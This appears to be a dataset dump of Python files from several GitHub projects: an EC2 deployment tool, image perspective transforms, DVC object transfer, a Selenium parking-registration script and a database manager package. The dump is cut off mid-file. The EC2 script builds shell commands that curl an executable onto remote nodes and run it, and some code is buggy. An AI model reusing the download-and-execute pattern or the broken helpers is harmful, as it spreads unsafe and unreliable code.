metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jojochuang/eventwave",
"score": 3
} |
#### File: tools/contextlattice/deployec2.py
```python
import os
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
import argparse
# set up variables
EC2_ACCESS_ID = '<KEY>'
EC2_SECRET_KEY = '<KEY>'
http_server = "https://galba.cs.purdue.edu:54321/"
Driver = get_driver(Provider.EC2)
conn = Driver(EC2_ACCESS_ID, EC2_SECRET_KEY)
nodes = conn.list_nodes()
for n in nodes:
print "Instance name: " + n.name + " IP: " + n.public_ips[0];
class Deploy( argparse.Action ):
def __call__(self, parser, namespace, values, option_string=None):
nodeips = " ".join( str(ip.public_ips[0]) for ip in nodes )
# download execuable
command = "curl " + http_server + "firstTag"
dlApplication = "pssh -H \"" + nodeips + "\" -l ubuntu -O \"IdentityFile ~/.ssh/contextlattice.pem\" " + command
os.system( dlApplication );
# download parameter file
command = "curl " + http_server + "params.tag"
dlApplication = "pssh -H \"" + nodeips + "\" -l ubuntu -O \"IdentityFile ~/.ssh/contextlattice.pem\" " + command
os.system( dlApplication );
# launch process
command = "./firstTag params.tag"
dlApplication = "pssh -H \"" + nodeips + "\" -l ubuntu -O \"IdentityFile ~/.ssh/contextlattice.pem\" " + command
os.system( dlApplication );
# command line option parser
parser = argparse.ArgumentParser(description='Tool for deploying and launching nodes in EC2.')
parser.add_argument('--listnode', nargs='?', default='a',dest='option_list', help="List EC2 nodes. Don't do anything else.")
parser.add_argument('--deploy', nargs='?', default='a', action=Deploy, help="Deploy executables and parameter files to the EC2 nodes.")
args = parser.parse_args()
``` |
{
"source": "jojo-/deepstream-birdseye",
"score": 2
} |
#### File: jojo-/deepstream-birdseye/perspective.py
```python
import numpy as np
import cv2
# Create the projection matrix based on the landmark correspondance between 2 images
# Note: if no targets/sources points are given, we have defaults values for the Demo
def ipm(source_points = None, target_points = None):
if source_points is None:
source_points = np.array(
[[551, 1031],
[487, 826],
[480, 366],
[964, 280]], dtype=np.float32
)
if target_points is None:
target_points = np.array(
[[404, 196],
[522, 202],
[1252, 339],
[1101, 752]], dtype=np.float32
)
# Compute projection matrix
M = cv2.getPerspectiveTransform(source_points, target_points)
return M
# Using the matrix generated by the `ipm` function, convert the coordinate of a pixel
# in a source image to the destination images
def convert_coordinates(point, M):
orig_px = point[point[0], point[1], 1 ]
tf_orig_px = M.dot(orig_px)
tf_orig_px = M.dot(orig_px) / tf_orig_px[2]
return tf_orig_px
# Using the matrix generated by the `ipm` function, convert the coordinate of a set of pixels
# in a source image to the destination images
def convert_set_cooordinates(points, M):
orig_pxs = np.array([[x, y, 1] for [x, y] in points]).T
tf_orig_pxs = M.dot(orig_pxs)
tf_orig_pxs /= tf_orig_pxs[2]
transf_points = np.array([[x,y] for [x, y] in tf_orig_pxs[:2].T])
return transf_points
def test():
import matplotlib
matplotlib.use("GTK3Agg")
import matplotlib.pyplot as plt
# Reading an input file
im_cam_view = "input/camera_view.png"
im = plt.imread(im_cam_view)
# Compute the transformation matrix
M = ipm()
# Warp the image
warped = cv2.warpPerspective(im, M, (im.shape[:2][1], im.shape[:2][0]), flags=cv2.INTER_LANCZOS4, borderMode=cv2.BORDER_CONSTANT, borderValue=0)
# Convert a point to new coordinates
orig_px = [1026, 408, 1]
tf_orig_px = M.dot(orig_px)
tf_orig_px = M.dot(orig_px) / tf_orig_px[2]
# Draw results
fig, ax = plt.subplots(1, 2)
ax[0].imshow(im)
ax[0].set_title('Front View')
ax[0].plot(orig_px[0], orig_px[1], 'bo')
ax[1].imshow(warped)
ax[1].set_title('IPM')
ax[1].plot(tf_orig_px[0], tf_orig_px[1], 'bo')
plt.tight_layout()
plt.show()
# Testing code
if __name__ == '__main__':
test()
``` |
{
"source": "JojoDevel/apriltags",
"score": 2
} |
#### File: JojoDevel/apriltags/setup.py
```python
import platform
import re
from pathlib import Path
from skbuild import setup
package_dir = "src"
package = "pupil_apriltags"
install_requires = ["numpy"]
if platform.system() == "Windows":
install_requires.append("pupil-pthreads-win")
cmake_args = []
if platform.system() == "Windows":
import pupil_pthreads_win as ptw
cmake_args.append(f"-DPTHREADS_WIN_INCLUDE_DIR='{ptw.include_path}'")
cmake_args.append(f"-DPTHREADS_WIN_IMPORT_LIB_PATH='{ptw.import_lib_path}'")
# The Ninja cmake generator will use mingw (gcc) on windows travis instances, but we
# need to use msvc for compatibility. The easiest solution I found was to just use
# the vs cmake generator as it defaults to msvc.
cmake_args.append("-GVisual Studio 15 2017 Win64")
cmake_args.append("-DCMAKE_WINDOWS_EXPORT_ALL_SYMBOLS=True")
with open("README.md") as readme_file:
readme = readme_file.read()
def read_version(path: Path):
with path.open() as f:
version_file = f.read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
here = Path(__file__).parent
setup(
author="<NAME> <EMAIL>",
author_email="<EMAIL>",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
cmake_args=cmake_args,
cmake_install_dir="src/pupil_apriltags",
description="Python bindings for apriltags v3",
extras_require={"dev": ["pytest", "tox"]},
install_requires=install_requires,
license="MIT license",
long_description=readme,
long_description_content_type="text/markdown",
include_package_data=True,
keywords="apriltags",
name="pupil-apriltags",
packages=[package],
package_dir={"": package_dir},
test_suite="tests",
url="https://github.com/pupil-labs/apriltags",
version=read_version(here / package_dir / package / "__init__.py"),
zip_safe=False,
)
``` |
{
"source": "JojoDevel/depthai-lightning",
"score": 2
} |
#### File: depthai-lightning/depthai_lightning/depthai_lightning.py
```python
import logging
import depthai as dai
class PipelineManager:
"""Hihg-level pipeline manager"""
xstream_names = set()
def __init__(self):
self.pipeline = dai.Pipeline()
self.device = None
self.nodes = []
def createDevice(self):
self.device = dai.Device(self.pipeline)
for node in self.nodes:
node.activate(self.device)
return self.device
def add_xstream_name(self, name: str) -> str:
"""Allows to safely add an xlink stream name. If the name already exists, a new unique will be generated.
Args:
name (str): the preferred xstream name.
Returns:
str: unique xstream name
"""
assert name
if name in self.xstream_names:
# generate new name
temp_name = str(name)
index = 0
while temp_name in self.xstream_names:
temp_name = f"{name}_{index}"
logging.info("Rename requested stream: %s -> %s", name, temp_name)
name = temp_name
self.xstream_names.add(name)
return name
``` |
{
"source": "JojoDevel/dvc",
"score": 2
} |
#### File: dvc/objects/transfer.py
```python
import errno
import itertools
import logging
from concurrent import futures
from concurrent.futures import ThreadPoolExecutor
from functools import partial, wraps
from typing import TYPE_CHECKING, Callable, Iterable, Optional
from funcy import split
from dvc.progress import Tqdm
if TYPE_CHECKING:
from dvc.hash_info import HashInfo
from .db.base import ObjectDB
from .db.index import ObjectDBIndexBase
logger = logging.getLogger(__name__)
def _log_exceptions(func):
@wraps(func)
def wrapper(path_info, *args, **kwargs):
try:
func(path_info, *args, **kwargs)
return 0
except Exception as exc: # pylint: disable=broad-except
# NOTE: this means we ran out of file descriptors and there is no
# reason to try to proceed, as we will hit this error anyways.
# pylint: disable=no-member
if isinstance(exc, OSError) and exc.errno == errno.EMFILE:
raise
logger.exception("failed to transfer '%s'", path_info)
return 1
return wrapper
def _transfer(
src, dest, dir_ids, file_ids, missing_ids, jobs, verify, move, **kwargs
):
func = _log_exceptions(dest.add)
total = len(dir_ids) + len(file_ids)
if total == 0:
return 0
with Tqdm(total=total, unit="file", desc="Transferring") as pbar:
func = pbar.wrap_fn(func)
with ThreadPoolExecutor(max_workers=jobs) as executor:
processor = partial(
_create_tasks,
executor,
jobs,
func,
src,
verify,
move,
)
processor.add_func = func
_do_transfer(
src,
dest,
dir_ids,
file_ids,
missing_ids,
processor,
verify=verify,
move=move,
**kwargs,
)
return total
def _create_tasks(executor, jobs, func, src, verify, move, obj_ids):
fails = 0
hash_iter = iter(obj_ids)
def submit(hash_info):
obj = src.get(hash_info)
return executor.submit(
func,
obj.path_info,
obj.fs,
obj.hash_info,
verify=verify,
move=move,
)
def create_taskset(amount):
return {
submit(hash_info)
for hash_info in itertools.islice(hash_iter, amount)
}
tasks = create_taskset(jobs * 5)
while tasks:
done, tasks = futures.wait(tasks, return_when=futures.FIRST_COMPLETED)
fails += sum(task.result() for task in done)
tasks.update(create_taskset(len(done)))
return fails
def _do_transfer(
src: "ObjectDB",
dest: "ObjectDB",
dir_ids: Iterable["HashInfo"],
file_ids: Iterable["HashInfo"],
missing_ids: Iterable["HashInfo"],
processor: Callable,
src_index: Optional["ObjectDBIndexBase"] = None,
dest_index: Optional["ObjectDBIndexBase"] = None,
cache_odb: Optional["ObjectDB"] = None,
**kwargs,
):
from dvc.exceptions import FileTransferError
from dvc.objects.errors import ObjectFormatError
total_fails = 0
succeeded_dir_objs = []
all_file_ids = set(file_ids)
for dir_hash in dir_ids:
from .tree import Tree
bound_file_ids = set()
dir_obj: Optional["Tree"] = None
for odb in (cache_odb, src):
if odb is not None:
try:
dir_obj = Tree.load(odb, dir_hash)
break
except (FileNotFoundError, ObjectFormatError):
pass
assert dir_obj
entry_ids = {entry.hash_info for _, entry in dir_obj}
for file_hash in all_file_ids.copy():
if file_hash in entry_ids:
bound_file_ids.add(file_hash)
all_file_ids.remove(file_hash)
dir_fails = processor(bound_file_ids)
if dir_fails:
logger.debug(
"failed to upload full contents of '%s', "
"aborting .dir file upload",
dir_obj.name,
)
logger.error(
"failed to upload '%s' to '%s'",
src.get(dir_obj.hash_info).path_info,
dest.get(dir_obj.hash_info).path_info,
)
total_fails += dir_fails + 1
elif entry_ids.intersection(missing_ids):
# if for some reason a file contained in this dir is
# missing both locally and in the remote, we want to
# push whatever file content we have, but should not
# push .dir file
logger.debug(
"directory '%s' contains missing files,"
"skipping .dir file upload",
dir_obj.name,
)
else:
raw_obj = src.get(dir_obj.hash_info)
is_dir_failed = processor.add_func( # type: ignore[attr-defined]
raw_obj.path_info,
raw_obj.fs,
raw_obj.hash_info,
**kwargs,
)
total_fails += is_dir_failed
if not is_dir_failed:
succeeded_dir_objs.append(dir_obj)
# insert the rest
total_fails += processor(all_file_ids)
if total_fails:
if src_index:
src_index.clear()
raise FileTransferError(total_fails)
# index successfully pushed dirs
if dest_index:
for dir_obj in succeeded_dir_objs:
file_hashes = {entry.hash_info.value for _, entry in dir_obj}
logger.debug(
"Indexing pushed dir '%s' with '%s' nested files",
dir_obj.hash_info,
len(file_hashes),
)
assert dir_obj.hash_info and dir_obj.hash_info.value
dest_index.update([dir_obj.hash_info.value], file_hashes)
def transfer(
src: "ObjectDB",
dest: "ObjectDB",
obj_ids: Iterable["HashInfo"],
jobs: Optional[int] = None,
verify: bool = False,
move: bool = False,
**kwargs,
) -> int:
"""Transfer (copy) the specified objects from one ODB to another.
Returns the number of successfully transferred objects
"""
from .status import compare_status
logger.debug(
"Preparing to transfer data from '%s' to '%s'",
src.path_info,
dest.path_info,
)
if src == dest:
return 0
status = compare_status(src, dest, obj_ids, check_deleted=False, **kwargs)
if not status.new:
return 0
dir_ids, file_ids = split(lambda hash_info: hash_info.isdir, status.new)
if jobs is None:
jobs = dest.fs.jobs
return _transfer(
src,
dest,
set(dir_ids),
set(file_ids),
status.missing,
jobs,
verify,
move,
**kwargs,
)
```
#### File: unit/utils/test_http.py
```python
import io
import requests
from dvc.utils.http import open_url
def read_nbytes(fd, num, mode="r"):
data = b"" if mode == "rb" else ""
while len(data) < num:
chunk = fd.read(num - len(data))
if not chunk:
break
data += chunk
return data
def test_open_url(tmp_path, monkeypatch, http):
# Simulate bad connection
original_iter_content = requests.Response.iter_content
def bad_iter_content(self, *args, **kwargs):
it = original_iter_content(self, *args, **kwargs)
for i, chunk in enumerate(it):
# Drop connection error on second chunk if there is one
if i > 0:
raise requests.ConnectionError("Simulated connection drop")
yield chunk
monkeypatch.setattr(requests.Response, "iter_content", bad_iter_content)
# Text should be longer than default chunk to test resume,
# using twice of that plus something tests second resume,
# this is important because second response is different
text = "0123456789" * (io.DEFAULT_BUFFER_SIZE // 10 + 1)
http.gen("sample.txt", text * 2)
with open_url((http / "sample.txt").url) as fd:
# Test various .read() variants
assert read_nbytes(fd, len(text), mode="r") == text
assert fd.read() == text
assert fd.read() == ""
def test_open_url_peek_rb(tmp_path, monkeypatch, http):
# Goes over seek feature in 'rb' mode
text = "0123456789" * (io.DEFAULT_BUFFER_SIZE // 10 + 1)
http.gen("sample.txt", text * 2)
with open_url((http / "sample.txt").url, mode="rb") as fd:
text = text.encode("utf8")
assert fd.peek(len(text)) == text # pylint: disable=no-member
assert read_nbytes(fd, len(text), mode="rb") == text
assert fd.peek(len(text)) == text # pylint: disable=no-member
assert fd.read() == text
assert fd.read() == b""
``` |
{
"source": "jojoduquartier/automated-guest-parking",
"score": 3
} |
#### File: jojoduquartier/automated-guest-parking/registration.py
```python
import time
from selenium import webdriver
def register_my_car(
url_,
apt_,
make_,
model_,
color_,
plate_,
phone_,
email_,
apt_unit,
apt_owner_fname,
apt_owner_lname,
**kwargs,
):
"""
Literally every step is spelled out but that is ok. Simple site.
"""
# xattr -d com.apple.quarantine /usr/local/bin/chromedriver
driver = webdriver.Chrome()
driver.get(url_)
try:
# apartment community
apt_input = driver.find_element_by_class_name("input__field")
apt_input.send_keys(apt_)
# after sending the apt there should be option to select
time.sleep(1)
xpath = "/html/body/div/div[2]/form/div[1]/div/div/div/ul/li"
to_click = driver.find_element_by_xpath(xpath)
to_click.click()
# resident info
xpath = "/html/body/div/div[2]/form/div[2]/div/div[1]/div/div/input"
f_name = driver.find_element_by_xpath(xpath)
f_name.send_keys(apt_owner_fname)
xpath = "/html/body/div/div[2]/form/div[2]/div/div[2]/div/div/input"
l_name = driver.find_element_by_xpath(xpath)
l_name.send_keys(apt_owner_lname)
xpath = "/html/body/div/div[2]/form/div[2]/div/div[3]/div/div/input"
unit = driver.find_element_by_xpath(xpath)
unit.send_keys(apt_unit)
# guest info
xpath = "/html/body/div/div[2]/form/div[3]/div/div[1]/div/div/input"
make = driver.find_element_by_xpath(xpath)
make.send_keys(make_)
xpath = "/html/body/div/div[2]/form/div[3]/div/div[2]/div/div/input"
model = driver.find_element_by_xpath(xpath)
model.send_keys(model_)
xpath = "/html/body/div/div[2]/form/div[3]/div/div[3]/div/div/input"
color = driver.find_element_by_xpath(xpath)
color.send_keys(color_)
xpath = "/html/body/div/div[2]/form/div[3]/div/div[4]/div/div/input"
plate = driver.find_element_by_xpath(xpath)
plate.send_keys(plate_)
# guest contact
xpath = "/html/body/div/div[2]/form/div[4]/div/div[1]/div/div/input"
phone = driver.find_element_by_xpath(xpath)
phone.send_keys(phone_)
xpath = "/html/body/div/div[2]/form/div[4]/div/div[2]/div[2]/div/input"
email = driver.find_element_by_xpath(xpath)
email.send_keys(email_)
# submit
submit = driver.find_element_by_tag_name("button")
submit.submit()
except Exception as e:
return False, e
finally:
time.sleep(1)
driver.close()
return True, None
``` |
{
"source": "jojoduquartier/dsdbmanager",
"score": 2
} |
#### File: dsdbmanager/dsdbmanager/cli.py
```python
import click
@click.group()
def main():
"""
:return:
"""
pass
@main.command()
def add_database():
from dsdbmanager.configuring import ConfigFilesManager
manager = ConfigFilesManager()
manager.add_new_database_info()
@main.command()
def remove_database():
from dsdbmanager.configuring import ConfigFilesManager
manager = ConfigFilesManager()
manager.remove_database()
@main.command()
def reset_credentials():
from dsdbmanager.configuring import ConfigFilesManager
manager = ConfigFilesManager()
manager.reset_credentials()
```
#### File: dsdbmanager/dsdbmanager/dbobject.py
```python
import time
import typing
import toolz
import inspect
import functools
import warnings
import numpy as np
import pandas as pd
import sqlalchemy as sa
import sqlalchemy.exc as exc
import sqlalchemy.sql.dml as dml
from .mssql_ import Mssql
from .mysql_ import Mysql
from .oracle_ import Oracle
from .teradata_ import Teradata
from .snowflake_ import Snowflake
from sqlalchemy.engine import reflection
from .configuring import ConfigFilesManager
from .utils import d_frame, inspect_table, filter_maker
from .constants import FLAVORS_FOR_CONFIG, CACHE_SIZE, CHUNK_SIZE
from .exceptions_ import (
BadArgumentType, OperationalError, NoSuchColumn, MissingFlavor, NotImplementedFlavor,
EmptyHostFile
)
host_type = typing.Dict[str, typing.Dict[str, typing.Dict[str, str]]]
update_key_type = typing.Union[typing.Tuple[str, ...], typing.Dict[str, str]]
table_middleware_type = typing.Callable[..., typing.Tuple[np.ndarray, typing.Tuple[str, ...]]]
connection_object_type = typing.Union[
Oracle,
Teradata,
Mysql,
Mssql,
Snowflake
]
def util_function(table_name: str, engine: sa.engine.base.Engine, schema: str) -> sa.Table:
"""
:param table_name: a table name. It must be a table in the schema of the engine
:param engine: the sqlalchemy engine for the database
:param schema: a schema of interest - None if default schema of database is ok
:return: the sqlalchemy Table type for the table name provided
"""
try:
return sa.Table(table_name, sa.MetaData(engine, schema=schema), autoload=True)
except exc.NoSuchTableError as e:
raise e
def insert_into_table(df: pd.DataFrame, table_name: str, engine: sa.engine.Engine, schema: str) -> int:
"""
:param df: a dataframe with same column names as those in the database table
:param table_name: a table name as in util_function
:param engine: the sqlalchemy engine for the database
:param schema: a schema of interest - None if default schema of database is ok
:return: the number of records inserted
"""
# get the table
tbl = util_function(table_name, engine, schema)
# change all nan to None
groups = toolz.partition_all(CHUNK_SIZE, df.where(pd.notnull(df), None).to_dict(orient='records'))
# insert
count, last_successful_insert = 0, None
with engine.connect() as connection:
for group in groups:
try:
result = connection.execute(tbl.insert(), group)
last_successful_insert = group[-1]
count += result.rowcount
except exc.OperationalError as _:
"Try Again"
time.sleep(2)
try:
result = connection.execute(tbl.insert(), group)
last_successful_insert = group[-1]
count += result.rowcount
except exc.OperationalError as e:
raise OperationalError(f"Failed to insert records. Last successful{last_successful_insert}", e)
return count
def update_on_table(df: pd.DataFrame, keys: update_key_type, values: update_key_type, table_name: str,
engine: sa.engine.base.Engine, schema: str) -> int:
"""
:param df: a dataframe with data tha needs to be updated. Must have columns to be used as key and some for values
:param keys: the set of columns to use as key, i.e. update when matched
:param values: the set of columns to update, i.e. set when matched
:param table_name: a table name as in util_function
:param engine: the sqlalchemy engine for the database
:param schema: a schema of interest - None if default schema of database is ok
:return: the number of records updated
"""
# get table
tbl = util_function(table_name, engine, schema)
# change nan to None, make sure columns are modified so that we can easily bindparam
df_ = df.copy()
df_.columns = [f"{el.lower()}_updt" for el in df_.columns]
groups = toolz.partition_all(CHUNK_SIZE, df_.where(pd.notnull(df_), None).to_dict(orient='records'))
if not isinstance(keys, tuple) and not isinstance(keys, dict):
raise BadArgumentType("keys and values must either be both tuples or both dicts", None)
# create where clause, and update statement
update_statement: dml.Update
if isinstance(keys, tuple):
if not isinstance(values, tuple):
raise BadArgumentType("keys and values must either be both tuples or both dicts", None)
where = [tbl.c[el] == sa.bindparam(f"{el.lower()}_updt") for el in keys]
update_statement = tbl.update().where(sa.and_(*where)).values(
dict((a, sa.bindparam(f"{a.lower()}_updt")) for a in values)
)
if isinstance(keys, dict):
if not isinstance(values, dict):
raise BadArgumentType("keys and values must either be both tuples or both dicts", None)
where = [tbl.c[k] == sa.bindparam(f"{v.lower()}_updt") for k, v in keys.items()]
update_statement = tbl.update().where(sa.and_(*where)).values(
dict((k, sa.bindparam(f"{v.lower()}_updt")) for k, v in values.items())
)
# update
count, last_successful_update = 0, None
with engine.connect() as connection:
for group in groups:
try:
result = connection.execute(update_statement, group)
last_successful_update = group[-1]
count += result.rowcount
except exc.OperationalError as _:
# try again
time.sleep(2)
try:
result = connection.execute(update_statement, group)
last_successful_update = group[-1]
count += result.rowcount
except exc.OperationalError as e:
raise OperationalError(
f"Failed to update records. Last successful update: {last_successful_update}", e
)
return count
def table_middleware(engine: sa.engine.base.Engine, table: str, schema: str = None):
"""
This does not directly look for the tables; it simply gives a function that can be used to specify
number of rows and columns etc. When this function is evaluated, it returns a function that holds the context.
That function has the table name, the schema and engine. It then knows what to query once it is called.
:param engine: the sqlalchemy engine for the database
:param table: a table name as in util_function
:param schema: a schema of interest - None if default schema of database is ok
:return: a function that when called, pulls data from the database table specified with 'table' arg
"""
@d_frame
@functools.lru_cache(CACHE_SIZE)
def wrapped(
rows: int = None,
columns: typing.Tuple[str, ...] = None,
**kwargs
) -> typing.Tuple[np.ndarray, typing.Tuple[str, ...]]:
"""
:param rows: number of rows of data to pull
:param columns: set of columns to pull
:param kwargs: column to filter
:return:
"""
tbl = util_function(table, engine, schema)
# query
tbl_cols = [el.name for el in tbl.columns]
if columns is None:
query = sa.select([tbl])
else:
# check if all columns are in table
not_in_table = set(columns) - set(tbl_cols)
if not_in_table == set(columns):
raise NoSuchColumn(f"None of the columns [{', '.join(sorted(columns))}] are in table {table}", None)
if len(not_in_table) > 0:
warnings.warn(f"Columns [{', '.join(sorted(not_in_table))}] are not in table {table}")
tbl_cols = [el for el in columns if el in tbl_cols]
query = sa.select([tbl.c[col] for col in tbl_cols])
if kwargs:
filters = [filter_maker(tbl, el, val) for el, val in kwargs.items()]
query = query.where(sa.and_(*filters))
# execute
with engine.connect() as connection:
results = connection.execute(query)
# fetch
if rows is not None:
array = results.fetchmany(rows)
else:
array = results.fetchall()
results.close()
# return dataframe
arr, cols = np.array(array), tuple(tbl_cols)
arr.flags.writeable = False
return arr, cols
return wrapped
class DbMiddleware(object):
"""
This is the main class that is wrapped around the sqlalchemy engines
Assume I have two tables, 'table_1' and 'table 2' in my default schema for an engine
>>> dbobject = DbMiddleware(engine, False, None)
>>> dbobject.sqlalchemy_engine.table_names()
['table_1', 'table 2']
I can access the tables as they are properties or methods rather
>>> dbobject.table1
>>> dbobject['table 2'] # because it is not possible to use the . notation here
But these do not do anything, in fact they are all just functions that I can call
>>> dbobject.table1(rows=10) # to get the first 10 rows
>>> dbobject['table 2'](rows=100, columns=('column', 'column with space')) # to only get the specified columns
I can also filter my data.
Say I want column_3 in table1 to be equal to 'some_value'
>>> dbobject.table1(column_3='some_value')
If I want to get data only when column_3 is either 'some_value' or 'other_value'
>>> dbobject.table1(column_3=('some_value', 'other_value')) # here I pass a tuple instead of a single value
tuples are used all around simply because we cache the result of these methods i.e. the dataframes
Say I had a column name that had spaces and I couldn't just do what I did above, I could do this
>>> dbobject.table1(**{'column with space': 'some_value'}) # simply unpacking the dictionary at execution time
All those methods to pull data are **table_middleware** functions already evaluated at engine,
table name and schema level.
Bonus
Get Metadata on your table
>>> dbobject._metadata.table1()
"""
def __init__(self, engine: sa.engine.Engine, connect_only: bool, schema: str = None):
self._sqlalchemy_engine = engine
if not connect_only:
inspection = reflection.Inspector.from_engine(self._sqlalchemy_engine)
# without schema, the inspector throws AttributeError
# any other error should be raised
try:
views = inspection.get_view_names(schema=schema)
tables = inspection.get_table_names(schema=schema)
except AttributeError as _:
views, tables = [], []
if not (tables + views):
pass
self._metadata = TableMeta(self.sqlalchemy_engine, schema, tables + views)
self._insert = TableInsert(self.sqlalchemy_engine, schema, tables + views)
self._update = TableUpdate(self.sqlalchemy_engine, schema, tables + views)
for table in tables + views:
self.__setattr__(table, table_middleware(self._sqlalchemy_engine, table, schema=schema))
@property
def sqlalchemy_engine(self):
return self._sqlalchemy_engine
@sqlalchemy_engine.setter
def sqlalchemy_engine(self, value):
raise AttributeError("sqlalchemy_engine cannot be changed")
@sqlalchemy_engine.deleter
def sqlalchemy_engine(self):
del self._sqlalchemy_engine
def __getitem__(self, item):
return self.__dict__[item]
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._sqlalchemy_engine.dispose()
properties = map(toolz.first, inspect.getmembers(self))
methods_only = map(toolz.first, inspect.getmembers(self, inspect.ismethod))
attributes = filter(lambda x: not x.startswith('__'), set(properties) - set(methods_only))
for attribute in attributes:
if attribute == 'sqlalchemy_engine':
continue # _sqlalchemy_engine is all we need to clear
delattr(self, attribute)
@toolz.curry
def db_middleware(config_manager: ConfigFilesManager, flavor: str, db_name: str,
connection_object: connection_object_type, config_schema: str, connect_only: bool,
schema: str = None, **engine_kwargs) -> DbMiddleware:
"""
Try connecting to the database. Write credentials on success. Using a function only so that the connection
is only attempted when function is called.
:param config_manager: a configuration manager to deal with host files etc
:param flavor: the sql flavor/dialect where the database lies
:param db_name: database name provided when adding database
:param connection_object: one of the connectors from the likes of myql_.py to create engine
:param config_schema: the schema provided when adding database
:param connect_only: True if all we want is connect and not inspect for tables or views
:param schema: if user wants to specify a different schema than the one supplied when adding database
:param engine_kwargs: engine arguments, like echo, or warehouse, schema and role for snowflake
:return:
"""
username, password = config_manager.read_credentials(flavor, db_name)
write_credentials = True
if username is None or password is None:
username, password = config_manager.ask_credentials()
else:
write_credentials = False
engine: sa.engine.base.Engine = connection_object.create_engine(
config_manager.encrypt_decrypt(username, encrypt=False).decode("utf-8"),
config_manager.encrypt_decrypt(password, encrypt=False).decode("utf-8"),
**engine_kwargs
)
try:
engine.connect().close()
except exc.DatabaseError as e:
raise e
if write_credentials:
config_manager.write_credentials(flavor, db_name, username, password)
if not schema:
schema = config_schema
# technically when connect_only is True, schema should not matter
middleware = DbMiddleware(engine, connect_only, schema)
return middleware
class DsDbManager(object):
"""
oracle = DsDbManager('oracle') # will create the object with databases as properties/methods
oracle.somedatabase # a function to call with <connect_only, schema>
-or-
oracle['some data base']
"""
def __init__(self, flavor: str, config_file_manager: ConfigFilesManager = None):
if flavor.lower() not in FLAVORS_FOR_CONFIG:
raise NotImplementedFlavor(
f"Invalid flavor: expected one of {', '.join(FLAVORS_FOR_CONFIG)}, got {flavor}",
None
)
self._flavor = flavor
self._config_file_manager = ConfigFilesManager() if config_file_manager is None else config_file_manager
self._host_dict = self._config_file_manager.get_hosts()
if not self._host_dict:
raise EmptyHostFile("Host file is empty", None)
if flavor not in self._host_dict:
raise MissingFlavor(f"No databases for {flavor}", None)
# available databases
self._available_databases = list(self._host_dict.get(flavor).keys())
self._schemas_per_databases = [
self._host_dict.get(flavor).get(database).get('schema', None)
for database in self._available_databases
]
# TODO: use schema provided by user if any. This will probably involve checking host dictionary
for db_name, config_schema in zip(self._available_databases, self._schemas_per_databases):
self.__setattr__(
db_name,
db_middleware(
self._config_file_manager,
self._flavor,
db_name,
self._connection_object_creator(db_name),
config_schema
)
)
def _connection_object_creator(self, db_name: str):
if self._flavor.lower() == 'oracle':
return Oracle(db_name, self._host_dict)
if self._flavor.lower() == 'teradata':
return Teradata(db_name, self._host_dict)
if self._flavor.lower() == 'mssql':
return Mssql(db_name, self._host_dict)
if self._flavor.lower() == 'mysql':
return Mysql(db_name, self._host_dict)
if self._flavor.lower() == 'snowflake':
return Snowflake(db_name, self._host_dict)
def __getitem__(self, item):
return self.__dict__[item]
class TableMeta(object):
"""
We have to create distinct functions for each table. Once the function is called, the metadata is provided
"""
def __init__(self, engine: sa.engine.base.Engine, schema: str, tables: typing.Tuple[str, ...]):
for table in tables:
def meta_function(t: str = table):
tbl = util_function(t, engine, schema)
return inspect_table(tbl)
self.__setattr__(table, meta_function)
class TableInsert(object):
"""
distinct functions for each table
"""
def __init__(self, engine: sa.engine.base.Engine, schema: str, tables: typing.Tuple[str, ...]):
for table in tables:
insert_function = functools.partial(insert_into_table, engine=engine, schema=schema)
def insert_func(df: pd.DataFrame, t: str = table):
"""
:param df:
:param t:
:return:
"""
return insert_function(df, t)
self.__setattr__(table, insert_func)
class TableUpdate(object):
"""
distinct functions for each table
"""
def __init__(self, engine: sa.engine.base.Engine, schema: str, tables: typing.Tuple[str, ...]):
for table in tables:
update_function = functools.partial(update_on_table, engine=engine, schema=schema)
def update_func(df: pd.DataFrame, keys: update_key_type, values: update_key_type, t: str = table):
"""
:param df:
:param keys:
:param values:
:param t:
:return:
"""
return update_function(df, keys, values, t)
self.__setattr__(table, update_func)
```
#### File: dsdbmanager/dsdbmanager/mssql_.py
```python
import typing
import sqlalchemy as sa
from .configuring import ConfigFilesManager
from .exceptions_ import MissingFlavor, MissingDatabase, MissingPackage
host_type = typing.Dict[str, typing.Dict[str, typing.Dict[str, str]]]
class Mssql:
def __init__(self, db_name: str, host_dict: host_type = None):
"""
:param db_name: database name
:param host_dict: optional database info with host, ports etc
"""
self.db_name = db_name
self.host_dict: host_type = ConfigFilesManager(
).get_hosts() if not host_dict else host_dict
if not self.host_dict or 'mssql' not in self.host_dict:
raise MissingFlavor("No databases available for mssql", None)
self.host_dict = self.host_dict.get('mssql').get(self.db_name, {})
if not self.host_dict:
raise MissingDatabase(
f"{self.db_name} has not been added for mssql", None)
def create_engine(self, user: str = None, pwd: str = None, **kwargs):
"""
:param user: username
:param pwd: password
:param kwargs: for compatibility/additional sqlalchemy create_engine kwargs
:return: sqlalchemy engine
"""
try:
import pymssql
except ImportError as e:
raise MissingPackage(
"You need the pymssql package to initiate connection", e
)
host = self.host_dict.get('host')
if 'port' not in self.host_dict:
if (
'use_dbname_to_connect' in self.host_dict and
not self.host_dict['use_dbname_to_connect']
):
return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}/', **kwargs)
else:
return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}/{self.db_name}', **kwargs)
port = self.host_dict.get('port')
if (
'use_dbname_to_connect' in self.host_dict and
not self.host_dict['use_dbname_to_connect']
):
return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}{port}/', **kwargs)
else:
return sa.create_engine(f'mssql+pymssql://{user}:{pwd}@{host}{port}/{self.db_name}', **kwargs)
```
#### File: dsdbmanager/test/test_connectors.py
```python
import unittest
from dsdbmanager.mssql_ import Mssql
from dsdbmanager.mysql_ import Mysql
from dsdbmanager.oracle_ import Oracle
from dsdbmanager.teradata_ import Teradata
from dsdbmanager.snowflake_ import Snowflake
from dsdbmanager.exceptions_ import MissingFlavor, MissingDatabase, MissingPackage
class TestConnectors(unittest.TestCase):
@classmethod
